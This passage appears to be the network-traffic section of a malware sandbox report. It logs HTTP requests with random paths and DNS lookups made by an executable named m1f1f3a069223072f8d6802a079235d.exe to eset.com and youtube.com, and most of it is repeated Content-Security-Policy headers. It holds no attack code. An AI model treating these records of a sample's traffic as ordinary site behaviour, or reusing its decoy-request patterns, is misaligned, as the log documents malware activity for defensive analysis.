https://fonts.smct.io https://script.hotjar.com; frame-src 'self' https://*.fls.doubleclick.net https://8117415.fls.doubleclick.net https://bid.g.doubleclick.net https://download.eset.com https://eset.demdex.net https://hemsync.clickagy.com https://int.form.eset.com https://js.smct.io https://ls.smct.co https://protectdemo.eset.com https://smct.co https://td.doubleclick.net https://tpc.googlesyndication.com https://unity.survey-solutions.cloud https://vars.hotjar.com https://widget.trustpilot.com https://www.facebook.com https://www.google.com https://www.googletagmanager.com https://www.youtube-nocookie.com https://www.youtube.com; img-src 'self' data: http://ad.doubleclick.net https://*.adform.net https://*.ads.linkedin.com https://*.yahoo.co.jp https://ad.doubleclick.net https://ade.googlesyndication.com https://adservice.google.at https://adservice.google.ch https://adservice.google.co.jp https://adservice.google.com https://adservice.google.de https://analytics.google.com https://analytics.twitter.com https://bat.bing.com https://c.bing.com https://c.clarity.ms https://captcha.eset.com https://cdn.esetstatic.com https://cdn.jsdelivr.net https://cdn.smct.co https://cdn.smct.io https://cdn1.esetstatic.com https://cm.everesttech.net https://cm.g.doubleclick.net https://connect.facebook.net https://dc.ads.linkedin.com https://dpm.demdex.net https://events.smct.co https://googleads.g.doubleclick.net https://i.ytimg.com https://images.g2crowd.com https://maps.googleapis.com https://pagead2.googlesyndication.com https://pubads.g.doubleclick.net https://px.ads.linkedin.com https://region1.analytics.google.com https://region1.google-analytics.com https://script.hotjar.com https://sgtm.eset.com https://ssitecat.eset.com https://ssl.google-analytics.com https://static.hotjar.com https://stats.g.doubleclick.net https://t.co https://tribl.io https://www.facebook.com https://www.google-analytics.com https://www.google.ad https://www.google.ae https://www.google.al https://www.google.am https://www.google.at https://www.google.az https://www.google.ba https://www.google.be https://www.google.bf https://www.google.bg https://www.google.bi https://www.google.bj https://www.google.bs https://www.google.bt https://www.google.by https://www.google.ca https://www.google.cd https://www.google.cf https://www.google.cg https://www.google.ch https://www.google.ci https://www.google.cl https://www.google.cm https://www.google.cn https://www.google.co.ao https://www.google.co.bw https://www.google.co.cr https://www.google.co.id https://www.google.co.il https://www.google.co.in https://www.google.co.jp https://www.google.co.ke https://www.google.co.kr https://www.google.co.ls https://www.google.co.ma https://www.google.co.mz https://www.google.co.nz https://www.google.co.th https://www.google.co.tz https://www.google.co.ug https://www.google.co.uk https://www.google.co.uz https://www.google.co.ve https://www.google.co.vi https://www.google.co.za https://www.google.co.zm https://www.google.co.zw https://www.google.com https://www.google.com.af https://www.google.com.ag https://www.google.com.ar https://www.google.com.au https://www.google.com.bd https://www.google.com.bh https://www.google.com.bn https://www.google.com.bo https://www.google.com.br https://www.google.com.bz https://www.google.com.co https://www.google.com.cu https://www.google.com.cy https://www.google.com.do https://www.google.com.ec https://www.google.com.eg https://www.google.com.et https://www.google.com.fj https://www.google.com.gh https://www.google.com.gi https://www.google.com.gt https://www.google.com.hk https://www.google.com.jm https://www.google.com.kh https://www.google.com.kw https://www.google.com.lb https://www.google.com.ly https://www.google.com.mm https://www.google.com.mt https://www.google.com.mx https://www.google.com.my https://www.google.com.na https://www.google.com.ng https://www.google.com.ni https://www.google.com.np https://www.google.com.om https://www.google.com.pa https://www.google.com.pe https://www.google.com.pg https://www.google.com.ph https://www.google.com.pk https://www.google.com.pr https://www.google.com.py https://www.google.com.qa https://www.google.com.sa https://www.google.com.sb https://www.google.com.sg https://www.google.com.sl https://www.google.com.sv https://www.google.com.tj https://www.google.com.tr https://www.google.com.tw https://www.google.com.ua https://www.google.com.uy https://www.google.com.vc https://www.google.com.vn https://www.google.cv https://www.google.cz https://www.google.de https://www.google.dj https://www.google.dk https://www.google.dm https://www.google.dz https://www.google.ee https://www.google.es https://www.google.fi https://www.google.fr https://www.google.ga https://www.google.ge https://www.google.gg https://www.google.gl https://www.google.gm https://www.google.gr https://www.google.gy https://www.google.hn https://www.google.hr https://www.google.ht https://www.google.hu https://www.google.ie https://www.google.im https://www.google.iq https://www.google.is https://www.google.it https://www.google.je https://www.google.jo https://www.google.kg https://www.google.ki https://www.google.kz https://www.google.la https://www.google.li https://www.google.lk https://www.google.lt https://www.google.lu https://www.google.lv https://www.google.md https://www.google.me https://www.google.mg https://www.google.mk https://www.google.ml https://www.google.mn https://www.google.mu https://www.google.mv https://www.google.mw https://www.google.ne https://www.google.nl https://www.google.no https://www.google.nr https://www.google.pl https://www.google.ps https://www.google.pt https://www.google.ro https://www.google.rs https://www.google.ru https://www.google.rw https://www.google.sc https://www.google.se https://www.google.si https://www.google.sk https://www.google.sm https://www.google.sn https://www.google.so https://www.google.sr https://www.google.td https://www.google.tg https://www.google.tl https://www.google.tm https://www.google.tn https://www.google.tt https://www.google.vg https://www.google.vu https://www.googleadservices.com https://www.googletagmanager.com https://www.hotjar.com https://www.linkedin.com; manifest-src 'none'; media-src 'self'; object-src 'self'; prefetch-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline' https://*.replay.uxtweak.com https://*.salesforceliveagent.com https://acsbap.com https://acsbapp.com https://assets.esetstatic.com https://bat.bing.com https://cdn.esetstatic.com https://cdn.jsdelivr.net https://cdn.linkedin.oribi.io https://cdn1.esetstatic.com https://cdnjs.cloudflare.com https://connect.facebook.net https://d.la1-c2-cdg.salesforceliveagent.com https://embed.tawk.to https://googleads.g.doubleclick.net https://img06.en25.com https://invitejs.trustpilot.com https://js.smct.co https://js.smct.io https://maps.googleapis.com https://nowexttype.com https://pagead2.googlesyndication.com https://platform.twitter.com https://s786665.t.eloqua.com https://script.hotjar.com https://sgtm.eset.com https://smct.co https://snap.licdn.com https://ssl.google-analytics.com https://static.ads-twitter.com https://static.hotjar.com https://store.eset.com https://tpc.googlesyndication.com https://tribl.io https://widget.trustpilot.com https://www.clarity.ms https://www.google-analytics.com https://www.google.ae https://www.google.am https://www.google.at https://www.google.be https://www.google.bg https://www.google.bs https://www.google.by https://www.google.ca https://www.google.cg https://www.google.ch https://www.google.ci https://www.google.cl https://www.google.cm https://www.google.co.id https://www.google.co.il https://www.google.co.in https://www.google.co.jp https://www.google.co.ke https://www.google.co.ma https://www.google.co.nz https://www.google.co.th https://www.google.co.uk https://www.google.co.uz https://www.google.co.ve https://www.google.co.za https://www.google.co.zw https://www.google.com https://www.google.cz https://www.google.de https://www.google.dj https://www.google.dz https://www.google.ee https://www.google.es https://www.google.fi https://www.google.fr https://www.google.ge https://www.google.gr https://www.google.hr https://www.google.hu https://www.google.ie https://www.google.kg https://www.google.kz https://www.google.lk https://www.google.lt https://www.google.md https://www.google.me https://www.google.mk https://www.google.nl https://www.google.pl https://www.google.ps https://www.google.pt https://www.google.ro https://www.google.ru https://www.google.se https://www.google.si https://www.google.sk https://www.google.tn https://www.googleadservices.com https://www.googleoptimize.com https://www.googletagmanager.com https://www.youtube.com; style-src 'self' 'unsafe-inline' https://cdn.jsdelivr.net https://fonts.smct.co https://fonts.smct.io https://script.hotjar.com https://static.hotjar.com; worker-src 'self'; report-uri https://www-eset-com.api.cspconsole.com/v1/csp/report; report-to default;
      Report-To: {"group":"default","max_age":31536000,"endpoints":[{"url":"https://www-eset-com.api.cspconsole.com/v1/csp/report"}],"include_subdomains":false}
      X-EDPS-Request-Status: normal
      Strict-Transport-Security: max-age=15724800
      Cache-Control: max-age=3600
      Date: Wed, 10 Apr 2024 02:30:05 GMT
      Transfer-Encoding: chunked
      Connection: keep-alive
      Connection: Transfer-Encoding
    • flag-be
      GET
      https://www.eset.com/No0TnWnOx1?q=0
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      104.117.77.144:443
      Request
      GET /No0TnWnOx1?q=0 HTTP/1.1
      Host: www.eset.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 301 Moved Permanently
      Content-Type: text/html
      Content-Length: 162
      Location: https://www.eset.com/No0TnWnOx1/?q=0
      Referrer-Policy: no-referrer-when-downgrade
      Feature-Policy: accelerometer 'none'; camera 'none'; geolocation 'none'; gyroscope 'none'; magnetometer 'none'; microphone 'none'; payment 'none'; usb 'none'; ambient-light-sensor 'none'; autoplay 'none'; encrypted-media 'none'; fullscreen 'self' https://www.youtube.com; midi 'none'; picture-in-picture 'none'; speaker 'none'; vr 'none'
      X-Frame-Options: SAMEORIGIN
      X-XSS-Protection: 1; mode=block; report=https://eset.report-uri.com/r/d/xss/enforce
      X-Content-Type-Options: nosniff
      Access-Control-Allow-Origin: https://www.eset.com
      Content-Security-Policy: default-src 'self'; connect-src 'self' http://ad.doubleclick.net https://*.analytics.google.com https://*.api.userway.org https://*.clarity.ms https://*.demdex.net https://*.eset.com https://*.googlesyndication.com https://*.hotjar.com https://*.hotjar.io https://*.tt.omtrdc.net https://adservice.google.com https://analytics.google.com https://analytics.twitter.com https://bat.bing.com https://c.go-mpulse.net https://cdn.acsbapp.com https://cdn.linkedin.oribi.io https://cdn1.esetstatic.com https://cookies-data.onetrust.io https://ep.smct.co https://eset.tt.omtrdc.net https://geolocation.onetrust.com https://googleads.g.doubleclick.net https://ipb.smct.co https://ipb.smct.io https://js.smct.co https://js.smct.io https://maps.googleapis.com https://privacyportal.onetrust.com https://px.ads.linkedin.com https://region1.google-analytics.com https://replay.uxtweak.com https://s.yimg.com https://script.crazyegg.com https://smct.co https://stats.g.doubleclick.net https://tracker.clickguard.com https://www.facebook.com https://www.g2.com https://www.google-analytics.com https://www.google.by https://www.google.ch https://www.google.co.uk https://www.google.co.uz https://www.google.com https://www.google.com.tj https://www.google.com.tr https://www.google.ie https://www.google.kg https://www.google.kz https://www.google.lt https://www.google.lv https://www.google.pl https://www.google.ru https://www.googletagmanager.com wss://*.hotjar.com; font-src 'self' data: https://cdn.userway.org https://fonts.smct.co https://fonts.smct.io https://script.hotjar.com; frame-src 'self' https://*.fls.doubleclick.net https://8117415.fls.doubleclick.net https://bid.g.doubleclick.net https://download.eset.com https://eset.demdex.net https://hemsync.clickagy.com https://int.form.eset.com https://js.smct.io https://ls.smct.co https://protectdemo.eset.com https://smct.co https://td.doubleclick.net https://tpc.googlesyndication.com https://unity.survey-solutions.cloud https://vars.hotjar.com https://widget.trustpilot.com https://www.facebook.com https://www.google.com https://www.googletagmanager.com https://www.youtube-nocookie.com https://www.youtube.com; img-src 'self' data: http://ad.doubleclick.net https://*.adform.net https://*.ads.linkedin.com https://*.yahoo.co.jp https://ad.doubleclick.net https://ade.googlesyndication.com https://adservice.google.at https://adservice.google.ch https://adservice.google.co.jp https://adservice.google.com https://adservice.google.de https://analytics.google.com https://analytics.twitter.com https://bat.bing.com https://c.bing.com https://c.clarity.ms https://captcha.eset.com https://cdn.esetstatic.com https://cdn.jsdelivr.net https://cdn.smct.co https://cdn.smct.io https://cdn1.esetstatic.com https://cm.everesttech.net https://cm.g.doubleclick.net https://connect.facebook.net https://dc.ads.linkedin.com https://dpm.demdex.net https://events.smct.co https://googleads.g.doubleclick.net https://i.ytimg.com https://images.g2crowd.com https://maps.googleapis.com https://pagead2.googlesyndication.com https://pubads.g.doubleclick.net https://px.ads.linkedin.com https://region1.analytics.google.com https://region1.google-analytics.com https://script.hotjar.com https://sgtm.eset.com https://ssitecat.eset.com https://ssl.google-analytics.com https://static.hotjar.com https://stats.g.doubleclick.net https://t.co https://tribl.io https://www.facebook.com https://www.google-analytics.com https://www.google.ad https://www.google.ae https://www.google.al https://www.google.am https://www.google.at https://www.google.az https://www.google.ba https://www.google.be https://www.google.bf https://www.google.bg https://www.google.bi https://www.google.bj https://www.google.bs https://www.google.bt https://www.google.by https://www.google.ca https://www.google.cd https://www.google.cf https://www.google.cg https://www.google.ch https://www.google.ci https://www.google.cl https://www.google.cm https://www.google.cn https://www.google.co.ao https://www.google.co.bw https://www.google.co.cr https://www.google.co.id https://www.google.co.il https://www.google.co.in https://www.google.co.jp https://www.google.co.ke https://www.google.co.kr https://www.google.co.ls https://www.google.co.ma https://www.google.co.mz https://www.google.co.nz https://www.google.co.th https://www.google.co.tz https://www.google.co.ug https://www.google.co.uk https://www.google.co.uz https://www.google.co.ve https://www.google.co.vi https://www.google.co.za https://www.google.co.zm https://www.google.co.zw https://www.google.com https://www.google.com.af https://www.google.com.ag https://www.google.com.ar https://www.google.com.au https://www.google.com.bd https://www.google.com.bh https://www.google.com.bn https://www.google.com.bo https://www.google.com.br https://www.google.com.bz https://www.google.com.co https://www.google.com.cu https://www.google.com.cy https://www.google.com.do https://www.google.com.ec https://www.google.com.eg https://www.google.com.et https://www.google.com.fj https://www.google.com.gh https://www.google.com.gi https://www.google.com.gt https://www.google.com.hk https://www.google.com.jm https://www.google.com.kh https://www.google.com.kw https://www.google.com.lb https://www.google.com.ly https://www.google.com.mm https://www.google.com.mt https://www.google.com.mx https://www.google.com.my https://www.google.com.na https://www.google.com.ng https://www.google.com.ni https://www.google.com.np https://www.google.com.om https://www.google.com.pa https://www.google.com.pe https://www.google.com.pg https://www.google.com.ph https://www.google.com.pk https://www.google.com.pr https://www.google.com.py https://www.google.com.qa https://www.google.com.sa https://www.google.com.sb https://www.google.com.sg https://www.google.com.sl https://www.google.com.sv https://www.google.com.tj https://www.google.com.tr https://www.google.com.tw https://www.google.com.ua https://www.google.com.uy https://www.google.com.vc https://www.google.com.vn https://www.google.cv https://www.google.cz https://www.google.de https://www.google.dj https://www.google.dk https://www.google.dm https://www.google.dz https://www.google.ee https://www.google.es https://www.google.fi https://www.google.fr https://www.google.ga https://www.google.ge https://www.google.gg https://www.google.gl https://www.google.gm https://www.google.gr https://www.google.gy https://www.google.hn https://www.google.hr https://www.google.ht https://www.google.hu https://www.google.ie https://www.google.im https://www.google.iq https://www.google.is https://www.google.it https://www.google.je https://www.google.jo https://www.google.kg https://www.google.ki https://www.google.kz https://www.google.la https://www.google.li https://www.google.lk https://www.google.lt https://www.google.lu https://www.google.lv https://www.google.md https://www.google.me https://www.google.mg https://www.google.mk https://www.google.ml https://www.google.mn https://www.google.mu https://www.google.mv https://www.google.mw https://www.google.ne https://www.google.nl https://www.google.no https://www.google.nr https://www.google.pl https://www.google.ps https://www.google.pt https://www.google.ro https://www.google.rs https://www.google.ru https://www.google.rw https://www.google.sc https://www.google.se https://www.google.si https://www.google.sk https://www.google.sm https://www.google.sn https://www.google.so https://www.google.sr https://www.google.td https://www.google.tg https://www.google.tl https://www.google.tm https://www.google.tn https://www.google.tt https://www.google.vg https://www.google.vu https://www.googleadservices.com https://www.googletagmanager.com https://www.hotjar.com https://www.linkedin.com; manifest-src 'none'; media-src 'self'; object-src 'self'; prefetch-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline' https://*.replay.uxtweak.com https://*.salesforceliveagent.com https://acsbap.com https://acsbapp.com https://assets.esetstatic.com https://bat.bing.com https://cdn.esetstatic.com https://cdn.jsdelivr.net https://cdn.linkedin.oribi.io https://cdn1.esetstatic.com https://cdnjs.cloudflare.com https://connect.facebook.net https://d.la1-c2-cdg.salesforceliveagent.com https://embed.tawk.to https://googleads.g.doubleclick.net https://img06.en25.com https://invitejs.trustpilot.com https://js.smct.co https://js.smct.io https://maps.googleapis.com https://nowexttype.com https://pagead2.googlesyndication.com https://platform.twitter.com https://s786665.t.eloqua.com https://script.hotjar.com https://sgtm.eset.com https://smct.co https://snap.licdn.com https://ssl.google-analytics.com https://static.ads-twitter.com https://static.hotjar.com https://store.eset.com https://tpc.googlesyndication.com https://tribl.io https://widget.trustpilot.com https://www.clarity.ms https://www.google-analytics.com https://www.google.ae https://www.google.am https://www.google.at https://www.google.be https://www.google.bg https://www.google.bs https://www.google.by https://www.google.ca https://www.google.cg https://www.google.ch https://www.google.ci https://www.google.cl https://www.google.cm https://www.google.co.id https://www.google.co.il https://www.google.co.in https://www.google.co.jp https://www.google.co.ke https://www.google.co.ma https://www.google.co.nz https://www.google.co.th https://www.google.co.uk https://www.google.co.uz https://www.google.co.ve https://www.google.co.za https://www.google.co.zw https://www.google.com https://www.google.cz https://www.google.de https://www.google.dj https://www.google.dz https://www.google.ee https://www.google.es https://www.google.fi https://www.google.fr https://www.google.ge https://www.google.gr https://www.google.hr https://www.google.hu https://www.google.ie https://www.google.kg https://www.google.kz https://www.google.lk https://www.google.lt https://www.google.md https://www.google.me https://www.google.mk https://www.google.nl https://www.google.pl https://www.google.ps https://www.google.pt https://www.google.ro https://www.google.ru https://www.google.se https://www.google.si https://www.google.sk https://www.google.tn https://www.googleadservices.com https://www.googleoptimize.com https://www.googletagmanager.com https://www.youtube.com; style-src 'self' 'unsafe-inline' https://cdn.jsdelivr.net https://fonts.smct.co https://fonts.smct.io https://script.hotjar.com https://static.hotjar.com; worker-src 'self'; report-uri https://www-eset-com.api.cspconsole.com/v1/csp/report; report-to default;
      Report-To: {"group":"default","max_age":31536000,"endpoints":[{"url":"https://www-eset-com.api.cspconsole.com/v1/csp/report"}],"include_subdomains":false}
      X-EDPS-Request-Status: normal
      Strict-Transport-Security: max-age=15724800
      Cache-Control: public, max-age=86351
      Date: Wed, 10 Apr 2024 02:30:03 GMT
      Connection: keep-alive
    • flag-be
      GET
      https://www.eset.com/No0TnWnOx1?q=0
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      104.117.77.144:443
      Request
      GET /No0TnWnOx1?q=0 HTTP/1.1
      Host: www.eset.com
      Response
      HTTP/1.1 301 Moved Permanently
      Content-Type: text/html
      Content-Length: 162
      Location: https://www.eset.com/No0TnWnOx1/?q=0
      Referrer-Policy: no-referrer-when-downgrade
      Feature-Policy: accelerometer 'none'; camera 'none'; geolocation 'none'; gyroscope 'none'; magnetometer 'none'; microphone 'none'; payment 'none'; usb 'none'; ambient-light-sensor 'none'; autoplay 'none'; encrypted-media 'none'; fullscreen 'self' https://www.youtube.com; midi 'none'; picture-in-picture 'none'; speaker 'none'; vr 'none'
      X-Frame-Options: SAMEORIGIN
      X-XSS-Protection: 1; mode=block; report=https://eset.report-uri.com/r/d/xss/enforce
      X-Content-Type-Options: nosniff
      Access-Control-Allow-Origin: https://www.eset.com
      Content-Security-Policy: default-src 'self'; connect-src 'self' http://ad.doubleclick.net https://*.analytics.google.com https://*.api.userway.org https://*.clarity.ms https://*.demdex.net https://*.eset.com https://*.googlesyndication.com https://*.hotjar.com https://*.hotjar.io https://*.tt.omtrdc.net https://adservice.google.com https://analytics.google.com https://analytics.twitter.com https://bat.bing.com https://c.go-mpulse.net https://cdn.acsbapp.com https://cdn.linkedin.oribi.io https://cdn1.esetstatic.com https://cookies-data.onetrust.io https://ep.smct.co https://eset.tt.omtrdc.net https://geolocation.onetrust.com https://googleads.g.doubleclick.net https://ipb.smct.co https://ipb.smct.io https://js.smct.co https://js.smct.io https://maps.googleapis.com https://privacyportal.onetrust.com https://px.ads.linkedin.com https://region1.google-analytics.com https://replay.uxtweak.com https://s.yimg.com https://script.crazyegg.com https://smct.co https://stats.g.doubleclick.net https://tracker.clickguard.com https://www.facebook.com https://www.g2.com https://www.google-analytics.com https://www.google.by https://www.google.ch https://www.google.co.uk https://www.google.co.uz https://www.google.com https://www.google.com.tj https://www.google.com.tr https://www.google.ie https://www.google.kg https://www.google.kz https://www.google.lt https://www.google.lv https://www.google.pl https://www.google.ru https://www.googletagmanager.com wss://*.hotjar.com; font-src 'self' data: https://cdn.userway.org https://fonts.smct.co https://fonts.smct.io https://script.hotjar.com; frame-src 'self' https://*.fls.doubleclick.net https://8117415.fls.doubleclick.net https://bid.g.doubleclick.net https://download.eset.com https://eset.demdex.net https://hemsync.clickagy.com https://int.form.eset.com https://js.smct.io https://ls.smct.co https://protectdemo.eset.com https://smct.co https://td.doubleclick.net https://tpc.googlesyndication.com https://unity.survey-solutions.cloud https://vars.hotjar.com https://widget.trustpilot.com https://www.facebook.com https://www.google.com https://www.googletagmanager.com https://www.youtube-nocookie.com https://www.youtube.com; img-src 'self' data: http://ad.doubleclick.net https://*.adform.net https://*.ads.linkedin.com https://*.yahoo.co.jp https://ad.doubleclick.net https://ade.googlesyndication.com https://adservice.google.at https://adservice.google.ch https://adservice.google.co.jp https://adservice.google.com https://adservice.google.de https://analytics.google.com https://analytics.twitter.com https://bat.bing.com https://c.bing.com https://c.clarity.ms https://captcha.eset.com https://cdn.esetstatic.com https://cdn.jsdelivr.net https://cdn.smct.co https://cdn.smct.io https://cdn1.esetstatic.com https://cm.everesttech.net https://cm.g.doubleclick.net https://connect.facebook.net https://dc.ads.linkedin.com https://dpm.demdex.net https://events.smct.co https://googleads.g.doubleclick.net https://i.ytimg.com https://images.g2crowd.com https://maps.googleapis.com https://pagead2.googlesyndication.com https://pubads.g.doubleclick.net https://px.ads.linkedin.com https://region1.analytics.google.com https://region1.google-analytics.com https://script.hotjar.com https://sgtm.eset.com https://ssitecat.eset.com https://ssl.google-analytics.com https://static.hotjar.com https://stats.g.doubleclick.net https://t.co https://tribl.io https://www.facebook.com https://www.google-analytics.com https://www.google.ad https://www.google.ae https://www.google.al https://www.google.am https://www.google.at https://www.google.az https://www.google.ba https://www.google.be https://www.google.bf https://www.google.bg https://www.google.bi https://www.google.bj https://www.google.bs https://www.google.bt https://www.google.by https://www.google.ca https://www.google.cd https://www.google.cf https://www.google.cg https://www.google.ch https://www.google.ci https://www.google.cl https://www.google.cm https://www.google.cn https://www.google.co.ao https://www.google.co.bw https://www.google.co.cr https://www.google.co.id https://www.google.co.il https://www.google.co.in https://www.google.co.jp https://www.google.co.ke https://www.google.co.kr https://www.google.co.ls https://www.google.co.ma https://www.google.co.mz https://www.google.co.nz https://www.google.co.th https://www.google.co.tz https://www.google.co.ug https://www.google.co.uk https://www.google.co.uz https://www.google.co.ve https://www.google.co.vi https://www.google.co.za https://www.google.co.zm https://www.google.co.zw https://www.google.com https://www.google.com.af https://www.google.com.ag https://www.google.com.ar https://www.google.com.au https://www.google.com.bd https://www.google.com.bh https://www.google.com.bn https://www.google.com.bo https://www.google.com.br https://www.google.com.bz https://www.google.com.co https://www.google.com.cu https://www.google.com.cy https://www.google.com.do https://www.google.com.ec https://www.google.com.eg https://www.google.com.et https://www.google.com.fj https://www.google.com.gh https://www.google.com.gi https://www.google.com.gt https://www.google.com.hk https://www.google.com.jm https://www.google.com.kh https://www.google.com.kw https://www.google.com.lb https://www.google.com.ly https://www.google.com.mm https://www.google.com.mt https://www.google.com.mx https://www.google.com.my https://www.google.com.na https://www.google.com.ng https://www.google.com.ni https://www.google.com.np https://www.google.com.om https://www.google.com.pa https://www.google.com.pe https://www.google.com.pg https://www.google.com.ph https://www.google.com.pk https://www.google.com.pr https://www.google.com.py https://www.google.com.qa https://www.google.com.sa https://www.google.com.sb https://www.google.com.sg https://www.google.com.sl https://www.google.com.sv https://www.google.com.tj https://www.google.com.tr https://www.google.com.tw https://www.google.com.ua https://www.google.com.uy https://www.google.com.vc https://www.google.com.vn https://www.google.cv https://www.google.cz https://www.google.de https://www.google.dj https://www.google.dk https://www.google.dm https://www.google.dz https://www.google.ee https://www.google.es https://www.google.fi https://www.google.fr https://www.google.ga https://www.google.ge https://www.google.gg https://www.google.gl https://www.google.gm https://www.google.gr https://www.google.gy https://www.google.hn https://www.google.hr https://www.google.ht https://www.google.hu https://www.google.ie https://www.google.im https://www.google.iq https://www.google.is https://www.google.it https://www.google.je https://www.google.jo https://www.google.kg https://www.google.ki https://www.google.kz https://www.google.la https://www.google.li https://www.google.lk https://www.google.lt https://www.google.lu https://www.google.lv https://www.google.md https://www.google.me https://www.google.mg https://www.google.mk https://www.google.ml https://www.google.mn https://www.google.mu https://www.google.mv https://www.google.mw https://www.google.ne https://www.google.nl https://www.google.no https://www.google.nr https://www.google.pl https://www.google.ps https://www.google.pt https://www.google.ro https://www.google.rs https://www.google.ru https://www.google.rw https://www.google.sc https://www.google.se https://www.google.si https://www.google.sk https://www.google.sm https://www.google.sn https://www.google.so https://www.google.sr https://www.google.td https://www.google.tg https://www.google.tl https://www.google.tm https://www.google.tn https://www.google.tt https://www.google.vg https://www.google.vu https://www.googleadservices.com https://www.googletagmanager.com https://www.hotjar.com https://www.linkedin.com; manifest-src 'none'; media-src 'self'; object-src 'self'; prefetch-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline' https://*.replay.uxtweak.com https://*.salesforceliveagent.com https://acsbap.com https://acsbapp.com https://assets.esetstatic.com https://bat.bing.com https://cdn.esetstatic.com https://cdn.jsdelivr.net https://cdn.linkedin.oribi.io https://cdn1.esetstatic.com https://cdnjs.cloudflare.com https://connect.facebook.net https://d.la1-c2-cdg.salesforceliveagent.com https://embed.tawk.to https://googleads.g.doubleclick.net https://img06.en25.com https://invitejs.trustpilot.com https://js.smct.co https://js.smct.io https://maps.googleapis.com https://nowexttype.com https://pagead2.googlesyndication.com https://platform.twitter.com https://s786665.t.eloqua.com https://script.hotjar.com https://sgtm.eset.com https://smct.co https://snap.licdn.com https://ssl.google-analytics.com https://static.ads-twitter.com https://static.hotjar.com https://store.eset.com https://tpc.googlesyndication.com https://tribl.io https://widget.trustpilot.com https://www.clarity.ms https://www.google-analytics.com https://www.google.ae https://www.google.am https://www.google.at https://www.google.be https://www.google.bg https://www.google.bs https://www.google.by https://www.google.ca https://www.google.cg https://www.google.ch https://www.google.ci https://www.google.cl https://www.google.cm https://www.google.co.id https://www.google.co.il https://www.google.co.in https://www.google.co.jp https://www.google.co.ke https://www.google.co.ma https://www.google.co.nz https://www.google.co.th https://www.google.co.uk https://www.google.co.uz https://www.google.co.ve https://www.google.co.za https://www.google.co.zw https://www.google.com https://www.google.cz https://www.google.de https://www.google.dj https://www.google.dz https://www.google.ee https://www.google.es https://www.google.fi https://www.google.fr https://www.google.ge https://www.google.gr https://www.google.hr https://www.google.hu https://www.google.ie https://www.google.kg https://www.google.kz https://www.google.lk https://www.google.lt https://www.google.md https://www.google.me https://www.google.mk https://www.google.nl https://www.google.pl https://www.google.ps https://www.google.pt https://www.google.ro https://www.google.ru https://www.google.se https://www.google.si https://www.google.sk https://www.google.tn https://www.googleadservices.com https://www.googleoptimize.com https://www.googletagmanager.com https://www.youtube.com; style-src 'self' 'unsafe-inline' https://cdn.jsdelivr.net https://fonts.smct.co https://fonts.smct.io https://script.hotjar.com https://static.hotjar.com; worker-src 'self'; report-uri https://www-eset-com.api.cspconsole.com/v1/csp/report; report-to default;
      Report-To: {"group":"default","max_age":31536000,"endpoints":[{"url":"https://www-eset-com.api.cspconsole.com/v1/csp/report"}],"include_subdomains":false}
      X-EDPS-Request-Status: normal
      Strict-Transport-Security: max-age=15724800
      Cache-Control: public, max-age=86351
      Date: Wed, 10 Apr 2024 02:30:03 GMT
      Connection: keep-alive
    • flag-be
      GET
      https://www.eset.com/No0TnWnOx1/?q=0
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      104.117.77.144:443
      Request
      GET /No0TnWnOx1/?q=0 HTTP/1.1
      Host: www.eset.com
    • flag-us
      DNS
      www.youtube.com
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      8.8.8.8:53
      Request
      www.youtube.com
      IN A
      Response
      www.youtube.com
      IN CNAME
      youtube-ui.l.google.com
      youtube-ui.l.google.com
      IN A
      172.217.16.238
      youtube-ui.l.google.com
      IN A
      142.250.200.14
      youtube-ui.l.google.com
      IN A
      142.250.200.46
      youtube-ui.l.google.com
      IN A
      216.58.201.110
      youtube-ui.l.google.com
      IN A
      216.58.204.78
      youtube-ui.l.google.com
      IN A
      216.58.213.14
      youtube-ui.l.google.com
      IN A
      172.217.169.14
      youtube-ui.l.google.com
      IN A
      172.217.169.78
      youtube-ui.l.google.com
      IN A
      172.217.169.46
      youtube-ui.l.google.com
      IN A
      142.250.179.238
      youtube-ui.l.google.com
      IN A
      142.250.180.14
      youtube-ui.l.google.com
      IN A
      142.250.187.206
      youtube-ui.l.google.com
      IN A
      142.250.187.238
      youtube-ui.l.google.com
      IN A
      142.250.178.14
    • flag-gb
      GET
      https://www.youtube.com/YggOLR313W?q=26
      m1f1f3a069223072f8d6802a079235d.exe
      Remote address:
      172.217.16.238:443
      Request
      GET /YggOLR313W?q=26 HTTP/1.1
      Host: www.youtube.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Content-Type: text/html; charset=utf-8
      X-Content-Type-Options: nosniff
      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
      Pragma: no-cache
      Expires: Mon, 01 Jan 1990 00:00:00 GMT
      Date: Wed, 10 Apr 2024 02:30:03 GMT
      X-Frame-Options: SAMEORIGIN
      Strict-Transport-Security: max-age=31536000
      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="youtube_main"
      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
      Report-To: {"group":"youtube_main","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube_main"}]}
      Origin-Trial: AvC9UlR6RDk2crliDsFl66RWLnTbHrDbp+DiY6AYz/PNQ4G4tdUTjrHYr2sghbkhGQAVxb7jaPTHpEVBz0uzQwkAAAB4eyJvcmlnaW4iOiJodHRwczovL3lvdXR1YmUuY29tOjQ0MyIsImZlYXR1cmUiOiJXZWJWaWV3WFJlcXVlc3RlZFdpdGhEZXByZWNhdGlvbiIsImV4cGlyeSI6MTcxOTUzMjc5OSwiaXNTdWJkb21haW4iOnRydWV9
      P3P: CP="This is not a P3P policy! See http://support.google.com/accounts/answer/151657?hl=en for more info."
      Server: ESF
      X-XSS-Protection: 0
      Set-Cookie: YSC=62yr8bgxCDs; Domain=.youtube.com; Path=/; Secure; HttpOnly; SameSite=none
      Set-Cookie: __Secure-YEC=Cgt0b1ZCcTBMRTh1cyir89ewBjIKCgJHQhIEGgAgMg%3D%3D; Domain=.youtube.com; Expires=Sat, 10-May-2025 02:30:02 GMT; Path=/; Secure; HttpOnly; SameSite=lax
